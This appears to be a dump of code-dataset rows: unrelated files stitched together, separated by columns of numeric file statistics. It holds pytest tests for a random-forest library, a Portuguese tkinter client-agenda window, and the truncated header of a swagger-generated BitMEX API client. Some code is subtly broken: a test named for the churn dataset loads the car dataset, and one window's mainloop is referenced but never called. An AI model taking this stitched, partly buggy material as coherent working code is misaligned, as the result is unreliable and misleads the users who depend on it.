"bin_partition",
[
np.array([3], dtype=np.uint8),
np.array([3, 4], dtype=np.uint8),
np.array([3, 4, 8], dtype=np.uint8),
],
)
@pytest.mark.parametrize(
"bin_", range(13),
)
def test_is_bin_in_partition(bin_partition, bin_):
in_partition = bin_ in bin_partition
assert is_bin_in_partition(bin_, bin_partition) == in_partition
def check_nodes(nodes, bin_partitions, aggregation):
node_count = nodes.size
assert node_count > 0
for node_id, node in enumerate(nodes):
# Check that node_id is indeed its index in the array
assert node_id == node["node_id"]
# Check that nodes contain both training and validation samples
assert node["n_samples_train"] >= 1
assert node["w_samples_train"] > 0.0
if aggregation:
assert node["n_samples_valid"] >= 1
assert node["w_samples_valid"] > 0.0
# Check start_train, end_train, start_valid and end_valid
start_train = node["start_train"]
end_train = node["end_train"]
start_valid = node["start_valid"]
end_valid = node["end_valid"]
assert start_train < end_train
if aggregation:
assert start_valid < end_valid
parent = node["parent"]
if node_id != 0:
# Check that node_id of the node is larger than the one of its parent
assert node_id > nodes[parent]["node_id"]
# Check that start_train, end_train, start_valid and end_valid are
# included in those of the parent
assert start_train >= nodes[parent]["start_train"]
assert end_train <= nodes[parent]["end_train"]
if aggregation:
assert start_valid >= nodes[parent]["start_valid"]
assert end_valid <= nodes[parent]["end_valid"]
# Check that depth of a child is +1 the one of its parent
assert node["depth"] == nodes[parent]["depth"] + 1
# TODO: Check that leaves have no child
# Check that categorical splits have non-empty bin_partition
if node["is_split_categorical"]:
bin_partition_start = node["bin_partition_start"]
bin_partition_end = node["bin_partition_end"]
assert bin_partition_start < bin_partition_end
bin_partition = bin_partitions[bin_partition_start:bin_partition_end]
assert bin_partition.size >= 1
if_leaf = node["is_leaf"]
# Check that no non-leaf node is pure
if not if_leaf:
assert node["impurity"] > 0.0
# Check that a pure node is a leaf
if node["impurity"] == 0:
assert if_leaf
if not if_leaf:
left_child = node["left_child"]
right_child = node["right_child"]
# Check that childs and parent information does match
assert node_id == nodes[left_child]["parent"]
assert node_id == nodes[right_child]["parent"]
# TODO: check that left childs are indeed left childs (we don't use
# these for now...)
# assert nodes[left_child]["is_left"] == True
# assert not nodes[right_child]["is_left"]
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_adult(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_adult()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial", "ovr"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_car(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_car()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation, dirichlet", [(False, 0.0), (True, 1e-7)])
@pytest.mark.parametrize("class_weight", [None, "balanced"])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize("multiclass", ["multinomial"])
@pytest.mark.parametrize("cat_split_strategy", ["binary", "all", "random"])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_nodes_on_churn(
n_estimators,
aggregation,
class_weight,
n_jobs,
max_features,
random_state,
dirichlet,
step,
multiclass,
cat_split_strategy,
one_hot_encode,
use_categoricals,
criterion,
):
dataset = load_car()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
cat_split_strategy=cat_split_strategy,
aggregation=aggregation,
criterion=criterion,
max_features=max_features,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
dirichlet=dirichlet,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
bin_partitions = tree._tree_classifier.bin_partitions
assert tree._tree_classifier.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("n_estimators", [2])
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("n_jobs", [1, -1])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize("step", [1.0])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
def test_nodes_on_boston(
n_estimators,
aggregation,
n_jobs,
max_features,
random_state,
step,
one_hot_encode,
use_categoricals,
):
dataset = load_boston()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestRegressor(
n_estimators=n_estimators,
n_jobs=n_jobs,
aggregation=aggregation,
max_features=max_features,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
for tree in clf.trees:
node_count = tree._tree_regressor.node_count
nodes = tree._tree_regressor.nodes[:node_count]
bin_partitions = tree._tree_regressor.bin_partitions
assert tree._tree_regressor.nodes.size >= node_count
check_nodes(nodes, bin_partitions, aggregation)
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize(
"min_samples_split, min_samples_leaf", [(2, 1), (13, 7), (3, 5)]
)
@pytest.mark.parametrize("criterion", ("gini", "entropy"))
def test_min_samples_split_min_samples_leaf_on_adult(
aggregation,
max_features,
random_state,
one_hot_encode,
use_categoricals,
min_samples_split,
min_samples_leaf,
criterion,
):
dataset = load_adult()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
n_estimators = 3
n_jobs = -1
class_weight = "balanced"
multiclass = "multinomial"
step = 1.0
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestClassifier(
n_estimators=n_estimators,
n_jobs=n_jobs,
multiclass=multiclass,
aggregation=aggregation,
max_features=max_features,
criterion=criterion,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
class_weight=class_weight,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
min_samples = min(min_samples_split, min_samples_leaf)
for tree in clf.trees:
node_count = tree._tree_classifier.node_count
nodes = tree._tree_classifier.nodes[:node_count]
for node_id, node in enumerate(nodes):
# Check that nodes respect the min_samples_split and
# min_samples_leaf constraints
assert node["n_samples_train"] >= min_samples
if aggregation:
assert node["n_samples_valid"] >= min_samples
@pytest.mark.parametrize("aggregation", [False, True])
@pytest.mark.parametrize("max_features", [None, "auto"])
@pytest.mark.parametrize("random_state", [42])
@pytest.mark.parametrize(
"one_hot_encode, use_categoricals", [(False, False), (False, True), (True, False)]
)
@pytest.mark.parametrize(
"min_samples_split, min_samples_leaf", [(2, 1), (13, 7), (3, 5)]
)
def test_min_samples_split_min_samples_leaf_on_boston(
aggregation,
max_features,
random_state,
one_hot_encode,
use_categoricals,
min_samples_split,
min_samples_leaf,
):
dataset = load_boston()
dataset.test_size = 1.0 / 5
dataset.standardize = False
dataset.one_hot_encode = one_hot_encode
n_estimators = 3
n_jobs = -1
step = 1.0
X_train, X_test, y_train, y_test = dataset.extract(random_state=random_state)
if use_categoricals:
categorical_features = dataset.categorical_features_
else:
categorical_features = None
clf = ForestRegressor(
n_estimators=n_estimators,
n_jobs=n_jobs,
aggregation=aggregation,
max_features=max_features,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
categorical_features=categorical_features,
random_state=random_state,
step=step,
)
clf.fit(X_train, y_train)
min_samples = min(min_samples_split, min_samples_leaf)
for tree in clf.trees:
node_count = tree._tree_regressor.node_count
nodes = tree._tree_regressor.nodes[:node_count]
for node_id, node in enumerate(nodes):
# Check that nodes respect the min_samples_split and
# min_samples_leaf constraints
assert node["n_samples_train"] >= min_samples
if aggregation:
assert node["n_samples_valid"] >= min_samples
| 34.221477
| 86
| 0.678499
| 1,900
| 15,297
| 5.160526
| 0.085789
| 0.054054
| 0.113514
| 0.018358
| 0.826007
| 0.807343
| 0.782356
| 0.759204
| 0.755023
| 0.734523
| 0
| 0.009164
| 0.215336
| 15,297
| 446
| 87
| 34.298206
| 0.807715
| 0.071517
| 0
| 0.797927
| 0
| 0
| 0.091717
| 0
| 0
| 0
| 0
| 0.002242
| 0.07513
| 1
| 0.020725
| false
| 0
| 0.012953
| 0
| 0.033679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7935711f077546265b20c05740a0ab8495ab1d51
| 14,861
|
py
|
Python
|
janeladetalhadaagenda.py
|
vinerodrigues/sistema-loja_main
|
15024e5f42ae446935986fbbf27dec470741e5d8
|
[
"MIT"
] | null | null | null |
janeladetalhadaagenda.py
|
vinerodrigues/sistema-loja_main
|
15024e5f42ae446935986fbbf27dec470741e5d8
|
[
"MIT"
] | null | null | null |
janeladetalhadaagenda.py
|
vinerodrigues/sistema-loja_main
|
15024e5f42ae446935986fbbf27dec470741e5d8
|
[
"MIT"
] | null | null | null |
from tkinter import*
import tkinter as tk
from functools import partial
from datetime import datetime
import time
import main_menu
import dbclientes
import cv2
class abrir_janela_detalhada(object):
def __init__(self, i):
self.carregar_scrollbars(i)
self.listar_financas(i)
def listar_financas(self, i):
def mostrar_foto(nome):
diretorio = "C:/sistema_loja-main/imagens_clientes/"+nome+".png"
imagem = cv2.imread(diretorio)
cv2.imshow("Original", imagem)
cv2.waitKey(0)
pass
x = dbclientes.clientes.keys() #¬ | ! £ ¢ §
#print("Lista: ",x)
for k in x:
#print('Nome:',k)
aux = ""
y = dbclientes.clientes[k.decode()].decode()
#print('Valor: ',y)
#self.data_aux = ''
#self.hora_aux = ''
nome = k.decode()
aux = ''
telefone = ''
data_de_nascimento=''
email=''
endereco = ''
self.data_aux=''
self.hora_aux=''
comentarios =''
for i in y:
##print("Correndo o data base - ",i)
if i == '¹' and telefone == '':
if aux == '':
telefone = ('021')
else:
telefone = aux
#self.entry_tel.delete(0,END)
#self.entry_tel.insert(END, telefone)
##print("Telefone: ",telefone)
aux = ''
elif i == '¹' and data_de_nascimento == '':
if aux == '':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
else:
data_de_nascimento = aux
#self.entry_nascimento.delete(0,END)
#self.entry_nascimento.insert(END, data_de_nascimento)
##print("data_de_nascimento: ", data_de_nascimento)
#data_de_nascimento = aux
##print(aux)
aux = ''
elif i == '¹' and email == '':
if aux == '':
email = "Vazio"
elif aux == ' ':
email = "Vazio"
elif email == ' ':
email = "Vazio"
elif email == " ":
email="Vazio"
else:
email = aux
#self.entry_email.delete(0,END)
#self.entry_email.insert(END, email)
aux = ''
##print("EMAIL: ", email)
elif i == '¹' and endereco == '':
if aux == '':
endereco = "1 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "2 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "3 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "4 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "tab -Rio de Janeiro - RJ"
else:
endereco = aux
#endereco = aux
##print("Endereço: ", aux)
##print("Endereço: ", endereco)
aux = ''
elif i == '¹' and self.data_aux == '':
if aux == '':
self.data_aux = ('00/00/0000')
else:
self.data_aux = aux
#data = aux
##print(" Data: ", self.data_aux)
aux = ''
elif i == '¹' and self.hora_aux == '':
if aux == '':
self.hora_aux = ('00:00')
else:
self.hora_aux = aux
#hora = aux
##print("Hora: ",self.hora_aux)
aux = ''
elif i == '¹' and comentarios == '':
if aux == '':
comentarios = ('1 -Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
else:
comentarios = aux
##print("Comentarios: ", comentarios)
aux = ''
elif i == '²':
break;
else:
aux += i
if self.data_aux != '':
self.frame_tabela = Frame(self.frame_auxiliar_scrollbar, width = 10, height = 5, relief = RIDGE, borderwidth = '3', bg = 'black')
self.frame_tabela.pack(pady = 10)
self.label_teste = Button(self.frame_tabela, text="Nome: "+ nome, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, command = partial(mostrar_foto, nome ))
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Telefone: "+ telefone, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w', )
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data de Nascimento: "+ data_de_nascimento, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Email: "+email, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Endereço: "+ endereco, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data: "+ self.data_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Hora: "+ self.hora_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Comentario: "+ comentarios, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
def carregar_scrollbars(self, i):
self.my_canvas = Canvas(i, width = 480)
self.my_canvas.pack(side= LEFT, fill = BOTH)
self.my_scrollsbars = Scrollbar(i, orient = VERTICAL, command = self.my_canvas.yview)
self.my_scrollsbars.pack(side = LEFT, fill= Y)
self.my_canvas.configure( yscrollcommand = self.my_scrollsbars.set, bg = 'black')
self.my_canvas.bind('<Configure>', lambda e: self.my_canvas.configure(scrollregion = self.my_canvas.bbox("all") ))
self.frame_scrollbar = Frame(self.my_canvas)
self.my_canvas.create_window((0,0),window=self.frame_scrollbar, anchor = "nw")
self.frame_auxiliar_scrollbar = Frame(self.frame_scrollbar, bg = 'black')#, relief = RIDGE, borderwidth = '3', width = 20, height = 6)#FRAME ESPECIAL AUXILIAR PARA A EXCLUSÃO E CONSTRUÇÃO DOS BOTÕES
self.frame_auxiliar_scrollbar.pack()
class abrir_janela_detalhada_mes(object):
def __init__(self, i, data):
self.data_recebida = data
self.carregar_scrollbars(i)
self.listar_financas(i)
def listar_financas(self, i):
def mostrar_foto(nome):
diretorio = "C:/sistema_loja-main/imagens_clientes/"+nome+".png"
imagem = cv2.imread(diretorio)
cv2.imshow("Original", imagem)
cv2.waitKey(0)
pass
x = dbclientes.clientes.keys() #¬ | ! £ ¢ §
#print("Lista: ",x)
for k in x:
##print('Nome:',k)
aux = ""
y = dbclientes.clientes[k.decode()].decode()
##print('Valor: ',y)
#self.data_aux = ''
#self.hora_aux = ''
nome = k.decode()
aux = ''
telefone = ''
data_de_nascimento=''
email=''
endereco = ''
self.data_aux=''
self.hora_aux=''
comentarios =''
for i in y:
##print("Correndo o data base - ",i)
if i == '¹' and telefone == '':
if aux == '':
telefone = ('021')
else:
telefone = aux
#self.entry_tel.delete(0,END)
#self.entry_tel.insert(END, telefone)
##print("Telefone: ",telefone)
aux = ''
elif i == '¹' and data_de_nascimento == '':
if aux == '':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
elif aux == ' ':
data_de_nascimento = ('00/00/0000')
else:
data_de_nascimento = aux
#self.entry_nascimento.delete(0,END)
#self.entry_nascimento.insert(END, data_de_nascimento)
##print("data_de_nascimento: ", data_de_nascimento)
#data_de_nascimento = aux
##print(aux)
aux = ''
elif i == '¹' and email == '':
if aux == '':
email = "Vazio"
elif aux == ' ':
email = "Vazio"
elif email == ' ':
email = "Vazio"
elif email == " ":
email="Vazio"
else:
email = aux
#self.entry_email.delete(0,END)
#self.entry_email.insert(END, email)
aux = ''
##print("EMAIL: ", email)
elif i == '¹' and endereco == '':
if aux == '':
endereco = "1 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "2 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "3 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "4 - Rio de Janeiro - RJ"
elif aux == ' ':
endereco = "tab -Rio de Janeiro - RJ"
else:
endereco = aux
#endereco = aux
##print("Endereço: ", aux)
##print("Endereço: ", endereco)
aux = ''
elif i == '¹' and self.data_aux == '':
if aux == '':
self.data_aux = ('00/00/0000')
else:
self.data_aux = aux
#data = aux
##print(" Data: ", self.data_aux)
aux = ''
elif i == '¹' and self.hora_aux == '':
if aux == '':
self.hora_aux = ('00:00')
else:
self.hora_aux = aux
#hora = aux
##print("Hora: ",self.hora_aux)
aux = ''
elif i == '¹' and comentarios == '':
if aux == '':
comentarios = ('1 -Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
elif aux == ' ':
comentarios = ('2 - Vazio')
else:
comentarios = aux
##print("Comentarios: ", comentarios)
aux = ''
elif i == '²':
break;
else:
aux += i
#print("Data do cliente marcado", self.data_aux)
#print("Data recebida do sistema",self.data_recebida)
a = self.data_aux[3::]
b = self.data_recebida[3::]
#print("Formato final data do cleinte",a)
#print("Formato final do sistema ",b)
if a == b :
self.frame_tabela = Frame(self.frame_auxiliar_scrollbar, width = 10, height = 5, relief = RIDGE, borderwidth = '3', bg = 'black')
self.frame_tabela.pack(pady = 10)
self.label_teste = Button(self.frame_tabela, text="Nome: "+ nome, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, command = partial(mostrar_foto, nome ))
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Telefone: "+ telefone, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w', )
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data de Nascimento: "+ data_de_nascimento, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Email: "+email, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Endereço: "+ endereco, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Data: "+ self.data_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Hora: "+ self.hora_aux, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
self.label_teste = Label(self.frame_tabela, text="Comentario: "+ comentarios, bg = 'black', fg = 'white', font = ('Franklin Gothic Medium', 12), relief = RIDGE, borderwidth = '1', width = 51, height = 1, justify = 'left', anchor = 'w')
self.label_teste.pack()
def carregar_scrollbars(self, i):
self.my_canvas = Canvas(i, width = 480)
self.my_canvas.pack(side= LEFT, fill = BOTH)
self.my_scrollsbars = Scrollbar(i, orient = VERTICAL, command = self.my_canvas.yview)
self.my_scrollsbars.pack(side = LEFT, fill= Y)
self.my_canvas.configure( yscrollcommand = self.my_scrollsbars.set, bg = 'black')
self.my_canvas.bind('<Configure>', lambda e: self.my_canvas.configure(scrollregion = self.my_canvas.bbox("all") ))
self.frame_scrollbar = Frame(self.my_canvas)
self.my_canvas.create_window((0,0),window=self.frame_scrollbar, anchor = "nw")
self.frame_auxiliar_scrollbar = Frame(self.frame_scrollbar, bg = 'black')#, relief = RIDGE, borderwidth = '3', width = 20, height = 6)#FRAME ESPECIAL AUXILIAR PARA A EXCLUSÃO E CONSTRUÇÃO DOS BOTÕES
self.frame_auxiliar_scrollbar.pack()
def abrir_janela_detalhada_cl():
janela_detalhada = tk.Tk()
abrir_janela_detalhada(janela_detalhada)
janela_detalhada['bg'] = 'black'
janela_detalhada.title("Agenda Completa")
width = 500
height = 800
x = 850
y = 0
#TAKE THE WINDOW SIZE AND PUT IN GEOMETRY
##print(aux)
janela_detalhada.geometry(f'{width}x{height}+{x}+{y}')
#janela_detalhada.geometry(("600x700"))
janela_detalhada.wm_iconbitmap('imagens/lou.ico')
janela_detalhada.mainloop
def abrir_janela_detalhada_cl_mes(data):
janela_detalhada_mes = tk.Tk()
abrir_janela_detalhada_mes(janela_detalhada_mes, data)
janela_detalhada_mes['bg'] = 'black'
janela_detalhada_mes.title("Agenda Completa")
width = 500
height = 800
x = 850
y = 0
#TAKE THE WINDOW SIZE AND PUT IN GEOMETRY
##print(aux)
janela_detalhada_mes.geometry(f'{width}x{height}+{x}+{y}')
#janela_detalhada.geometry(("600x700"))
janela_detalhada_mes.wm_iconbitmap('imagens/lou.ico')
janela_detalhada_mes.mainloop()
| 36.334963
| 254
| 0.60292
| 1,927
| 14,861
| 4.518422
| 0.095485
| 0.033077
| 0.051453
| 0.034914
| 0.939015
| 0.917882
| 0.917882
| 0.908694
| 0.908694
| 0.908694
| 0
| 0.028289
| 0.23168
| 14,861
| 409
| 255
| 36.334963
| 0.733579
| 0.129937
| 0
| 0.891803
| 0
| 0
| 0.12865
| 0.009657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0.006557
| 0.02623
| 0
| 0.065574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f701ffdb06c403bc4f6a1e71c86342279da88863
| 69,260
|
py
|
Python
|
bitmex_swagger/api/order_api.py
|
silencewwt/bitmex-swagger-client
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | 1
|
2018-08-04T15:05:43.000Z
|
2018-08-04T15:05:43.000Z
|
bitmex_swagger/api/order_api.py
|
silencewwt/bitmex-swagger
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | null | null | null |
bitmex_swagger/api/order_api.py
|
silencewwt/bitmex-swagger
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
class OrderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def order_amend(self, **kwargs): # noqa: E501
"""Amend the quantity or price of an open order. # noqa: E501
